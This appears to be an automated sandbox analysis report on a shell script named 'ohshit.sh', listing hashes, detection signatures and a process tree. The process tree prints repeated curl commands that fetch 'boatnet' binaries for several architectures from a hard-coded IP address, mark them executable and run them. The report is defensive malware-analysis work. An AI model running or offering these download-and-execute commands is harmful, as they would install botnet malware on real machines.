Analysis

  • max time kernel
    60s
  • max time network
    63s
  • platform
    debian-12_armhf
  • resource
    debian12-armhf-20240418-en
  • resource tags

    arch:armhf
    image:debian12-armhf-20240418-en
    kernel:6.1.0-17-armmp-lpae
    locale:en-us
    os:debian-12-armhf
    system
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 7 IoCs

    Checks CPU information which indicates whether the system is a virtual machine.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:700
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:706
    • /usr/bin/cat
      cat boatnet.x86
      2⤵
      PID:755
    • /usr/bin/chmod
      chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF
      2⤵
      PID:756
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:757
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.mips
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:761
    • /usr/bin/cat
      cat boatnet.mips
      2⤵
      PID:769
    • /usr/bin/chmod
      chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
      2⤵
      PID:770
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:771
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.arc
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:774
    • /usr/bin/cat
      cat boatnet.arc
      2⤵
      PID:775
    • /usr/bin/chmod
      chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
      2⤵
      PID:776
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:777
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.i468
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:780
    • /usr/bin/cat
      cat boatnet.i468
      2⤵
      PID:781
    • /usr/bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
      2⤵
      PID:782
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:783
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.i686
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:785
    • /usr/bin/cat
      cat boatnet.i686
      2⤵
      PID:786
    • /usr/bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
      2⤵
      PID:787
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:788
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:790
    • /usr/bin/cat
      cat boatnet.x86_64
      2⤵
      PID:791
    • /usr/bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
      2⤵
      PID:792
    • /tmp/WTF
      ./WTF
      2⤵
      • Executes dropped EXE
      PID:793
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:796

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/boatnet.x86

    Filesize

    36KB

    MD5

    ba2cb5b8715ba94c39e24e75a34d0ea0

    SHA1

    7182bf3b0e14e5224e741c15174c6e93f00df444

    SHA256

    01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

    SHA512

    0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d